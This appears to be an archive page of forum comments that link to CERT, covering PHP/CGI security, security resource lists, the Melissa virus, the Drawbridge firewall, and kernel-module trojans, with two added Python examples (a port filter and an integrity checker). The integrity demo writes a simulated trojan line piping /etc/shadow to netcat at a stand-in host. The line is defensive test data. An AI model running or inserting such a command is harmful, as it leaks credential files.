Domain: cert.org
Stories and comments across the archive that link to cert.org.
Comments · 757
-
Re:CGI
And your cgi concerns aren't too well-founded. The thing you can do with the cgi version, at least under Unix, is to run it as your own user id through suExec which is quite safe.
I think they are. Check out this CERT advisory, as well as this page from the php manual. It's certainly possible to set up a host like this guy is suggesting.. but some care needs to be taken. I'm not familiar with IIS, so I can't comment on the availability of a chroot()-style environment.
Also, ODBC support is not new to PHP 4. It was in PHP 3 as well and it hasn't changed much.
Okay, you caught me on this one - I went back and looked, and there is indeed support for an ODBC driver manager in php3.
:} About your comment that php4 is open source... I quote the php4 License FAQ: "Second, the license prevents commercial use of the Zend library to build commercial applications." Correct me if I'm wrong.. but that sounds an awful lot like a violation of OSD rule #1. See this link for the full monty.
-
info: security distributions & resources
see the Linux Weekly News' Security page for information on Linux security projects which are already under way:
Secure Linux Projects
Bastille Linux
Khaos Linux
Secure Linux
Security List Archives
Bugtraq Archive
Firewall Wizards Archive
ISN Archive
Distribution-specific links
Caldera Advisories
Debian Alerts
Red Hat Errata
SuSE Announcements
Miscellaneous Resources
CERT
CIAC
Comp Sec News Daily
Crypto-GRAM
Linux Security Audit Project
OpenSEC
Security Focus
SecurityPortal
-
ZDnet Story
The ZDnet Story has more info about it, hopefully CERT will get moving on it soon.
---
Tim Wilde
Sysadmin, Dynamic DNS Network Services
-
Naming of Melissa virus
Katz writes:
He allegedly named his virus after a topless dancer in Florida.
As I understand it, the virus was named for part of the registry modifications it makes. I could be wrong, but the CERT advisory FAQ says: "It was named Melissa by the antivirus software vendors."
-
Talk to TAMU about Drawbridge and Tiger
Talk to Texas A&M University about their tools for security. Especially their firewall Drawbridge, and Tiger security auditing scripts. They also have monitoring software to monitor their internal network for cracking signatures.
Another source is to look at CERT. They have lots of links to documents and articles on security. One of their documents pointed me to the TAMU stuff.
Drawbridge is designed for blocking off site access on a machine/port by machine/port basis. Machines that pass the tiger scripts are enabled for more external access than ones that don't. As a default only SMTP is enabled from off site to a machine. Higher levels of external access can be obtained when a machine meets tighter security levels.
One of the nice things about Drawbridge is it can be run on a PC, and securely remotely updated. It also uses lookup tables so it's fast. It is a memory hog, but then that's the price for speed. I believe it will only work for Class B and C networks.
Email me at bryan@visi.com, and I'll gather a bunch of related links from my bookmarks at home. There are some good PDFs on their experiences, and the tools they made to implement security.
I've been dealing with security a lot lately as I've recently set up a firewall for my home system. I personally don't use Drawbridge as my network is small and Linux IPCHAINS is more suited to my system. I do use some of the Tiger scripts for auditing. I also use Tripwire (available from CERT).
-
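An added illustration of the lookup-table design the Drawbridge comment above describes, written for this page rather than taken from Drawbridge itself: each inside machine gets a port bitmap sized to the whole port range (which is where the speed and the memory cost both come from), a machine's audit level selects which inbound ports are set, and the default table opens only SMTP. The audit levels, port sets, addresses and "audit results" are all constructed for the example.

```python
"""
Added example (not Drawbridge's own code): a Drawbridge-style inbound filter
that decides each (machine, port) from precomputed per-machine lookup tables.

Everything below the imports is an assumption made for illustration: the
security levels 0-2, the ports opened at each level, the inside network,
and the per-host audit results.
"""
import ipaddress

# Ports opened inbound from off site at each audit level (constructed policy).
# Level 0 is the default: only SMTP, matching the Drawbridge default described.
LEVEL_PORTS = {
    0: {25},
    1: {25, 80, 443},
    2: {25, 80, 443, 22},
}

PORT_TABLE_BYTES = 65536 // 8   # one bit per port -> 8 KiB per machine


class PortTable:
    """Bitmap of allowed inbound ports for one machine; lookup is O(1)."""

    def __init__(self, ports=()):
        self.bits = bytearray(PORT_TABLE_BYTES)
        for port in ports:
            self.allow(port)

    def allow(self, port):
        if not 0 <= port <= 65535:
            raise ValueError("port out of range: %r" % port)
        self.bits[port >> 3] |= 1 << (port & 7)

    def allows(self, port):
        return bool(self.bits[port >> 3] & (1 << (port & 7)))


class InboundFilter:
    """Per-destination-host port tables with a shared default table."""

    def __init__(self, inside_net, default_level=0):
        self.inside = ipaddress.ip_network(inside_net)
        self.default = PortTable(LEVEL_PORTS[default_level])
        self.tables = {}   # IPv4Address -> PortTable for hosts that earned more

    def set_level(self, host, level):
        self.tables[ipaddress.ip_address(host)] = PortTable(LEVEL_PORTS[level])

    def allow(self, src, dst, dport):
        """Return True if a packet src -> dst:dport may pass inbound."""
        src, dst = ipaddress.ip_address(src), ipaddress.ip_address(dst)
        if src in self.inside:
            return True    # only traffic arriving from off site is filtered here
        if dst not in self.inside:
            return False   # not one of our machines: do not forward it
        return self.tables.get(dst, self.default).allows(dport)

    def memory_bytes(self):
        """Size of all bitmaps held in memory (the 'memory hog' part)."""
        return (len(self.tables) + 1) * PORT_TABLE_BYTES


def build_filter():
    """Constructed site: 192.0.2.0/24 inside, two hosts passed stricter audits."""
    flt = InboundFilter("192.0.2.0/24")
    audit_results = {"192.0.2.10": 2, "192.0.2.20": 1}   # host -> level earned
    for host, level in audit_results.items():
        flt.set_level(host, level)
    return flt


def sample_decisions():
    """Decisions for a few constructed packets (src, dst, dst port)."""
    flt = build_filter()
    packets = [
        ("198.51.100.7", "192.0.2.10", 22),   # level-2 host: SSH allowed
        ("198.51.100.7", "192.0.2.20", 22),   # level-1 host: SSH refused
        ("198.51.100.7", "192.0.2.30", 25),   # unaudited host: SMTP only
        ("198.51.100.7", "192.0.2.30", 80),   # unaudited host: HTTP refused
        ("192.0.2.30", "192.0.2.10", 22),     # inside to inside: not filtered
    ]
    return [flt.allow(*pkt) for pkt in packets]


if __name__ == "__main__":
    print(sample_decisions())
    print("bitmap memory:", build_filter().memory_bytes(), "bytes")
```

The memory figure is the point of the trade-off in the comment: every host with its own table costs a full 8 KiB bitmap regardless of how few ports it opens, in exchange for a decision that is one shift and one mask per packet.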
Mettler's attack slightly different
Mettler's attack is a modification of your system by a trusted user, via source. It's slightly different from the TCP-Wrappers crack in that you presumably don't have extensive peer review over your own system.
Researching a different topic I came across an interesting CERT advisory regarding loadable kernel modules. One common response to Mettler was that any kernel hack would require recompiling the kernel, and restarting the system. With loadable modules, system restart isn't necessary -- the kernel can be modified in place, as it runs.
In all three instances, confirming source, object, or image against a trusted version would help in detection. Kernel compromise is a frightening prospect as it undermines the trustworthiness of the entire system. Booting a fresh kernel, however, removes the damage (you then have to keep the rogue modules out).
-
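As an added example of the "confirm against a trusted version" advice in the two comments above (the Tripwire mention and the loadable-module point), written for this page and not taken from Tripwire or CERT: a baseline of file digests and modes is taken once, a later snapshot is compared against it, and the running kernel's loaded-module list is checked against a known-good list so that a module inserted without a reboot still shows up. The directory tree, file contents and /proc/modules text are constructed in the example; the module names are invented.

```python
"""
Added example (not Tripwire's or CERT's code): a minimal file-integrity
baseline/verify cycle plus a loaded-kernel-module check.

Assumptions: the sample file tree, its contents and both /proc/modules
listings below are constructed for illustration. In real use the baseline
must be kept where a compromised host cannot rewrite it (read-only media
or another machine), or the comparison proves nothing.
"""
import hashlib
import os
import tempfile


def file_digest(path):
    """SHA-256 of a file's contents, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Map each regular file under root (relative path) to (sha256, mode, size)."""
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue                     # don't follow links out of the tree
            st = os.lstat(full)
            rel = os.path.relpath(full, root)
            out[rel] = (file_digest(full), st.st_mode & 0o7777, st.st_size)
    return out


def compare(baseline, current):
    """Files added, removed, or whose digest/mode/size differ from baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(p for p in baseline.keys() & current.keys()
                          if baseline[p] != current[p]),
    }


def parse_proc_modules(text):
    """Module names from /proc/modules-style lines (name is the first field)."""
    return {line.split()[0] for line in text.splitlines() if line.strip()}


def unexpected_modules(baseline_text, current_text):
    """Modules loaded now that were not in the known-good list."""
    return sorted(parse_proc_modules(current_text) - parse_proc_modules(baseline_text))


# Constructed /proc/modules listings (fields: name size refcount deps state addr).
KNOWN_GOOD_MODULES = (
    "e1000 123456 0 - Live 0xffffffffc0000000\n"
    "ext4 654321 1 - Live 0xffffffffc0100000\n"
)
RUNNING_MODULES = KNOWN_GOOD_MODULES + "hidemod 4096 0 - Live 0xffffffffc0200000\n"


def demo():
    """Build a tree, baseline it, tamper with it, and report what was caught."""
    with tempfile.TemporaryDirectory() as root:
        files = {                             # constructed sample tree
            "sbin/login": b"#!/bin/sh\necho login\n",
            "sbin/init": b"init-binary-v1",
            "lib/libc.so": b"libc-image-v1",
        }
        for rel, data in files.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as f:
                f.write(data)
            os.chmod(full, 0o644)
        baseline = snapshot(root)

        # Tampering: a trojaned binary, a mode-only change, and a new file.
        with open(os.path.join(root, "sbin/login"), "wb") as f:
            f.write(b"#!/bin/sh\necho login; cat /etc/shadow | nc evil 1\n")
        os.chmod(os.path.join(root, "sbin/init"), 0o4755)
        with open(os.path.join(root, "lib/rootkit.so"), "wb") as f:
            f.write(b"rogue-library")

        report = compare(baseline, snapshot(root))
    rogue = unexpected_modules(KNOWN_GOOD_MODULES, RUNNING_MODULES)
    return report, rogue


if __name__ == "__main__":
    print(demo())
```

The mode is part of the baseline tuple on purpose: a setuid bit added to an unchanged binary is exactly the kind of change a content-only digest misses. The module check is only as good as the view of /proc/modules the kernel gives you, which is the comment's point about booting a fresh kernel before trusting what it reports.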
Stop calling them "hackers" and legitimizing them.
Umm, the correct term in this case is "hacking organizations." The Cult of the Dead cow and L0pht are unquestionably respectable hacker groups, not hax0r d00dz.
While there is some amount of hackish activity in the true sense in those groups, they can't be called "hacking organisation". A hacking organisation is for instance the FreeBSD core team or the Samba team. If you look at the site of L0pht (and why the hell are they naming their organization like hax0r d00dz would do ???), you'll see everywhere the word crack; currently on the site there is an ad for "L0phtcrack" with the slogan "Sniff. Crack. Faster", links to obvious crackers' sites like "Hackers News Network", etc...
Yes, they don't infringe the law, but they constantly, implicitly or explicitly, advocate cracking systems, or idealize cracking as being cool, and constantly use crackerspeak, and crackers' attitude (crackers' attitude is close to the caricature of show-offs doing rap music: "Yo my brother, we are cool and mighty and rebels").
I'm sorry but if I saw on a site from some organisation an ad with "Rape. Murder. Theft", constant implicit praise of rapes, murders and thefts, and, associated with any reference to a technique to, for instance, avoid Russian Mafia's murderers, a note such as "of course as usual these advices can also be used to commit murders, and to get rid of your wife or your neighbor", with links to sites selling weapons, then I legitimately won't call this organisation a "respectable" organisation.
I agree that since their primary goal is not cracking, "cracking organisations" is perhaps too much, but since they are one of the primary sources of code and information for "hax0r d00dz", and since they are adopting partly crackers' viewpoint, and entirely their attitude and language, it is indisputably more appropriate to call them "cracking organizations" than "hacking organizations". Maybe it would be even more appropriate to call them "organization focusing on security problems with a cretinous rebel attitude, hax0r-d00dz language and dubious sympathy for crackers". But never, NEVER, a "hacking organization". Again a typical "hacking organization" is the FreeBSD core team. For an organization without an idiotic I'm-cool-dude attitude and focusing on security problems, see CERT site.
"And I dunno where ESR got this cracker thing from."
Probably from Real Life(tm). Get your head out of the lame self-promoting crackers' sites, you'll see that everywhere else, crackers are considered as nuisance, misguided teenagers and at worst hopeless moronic assholes.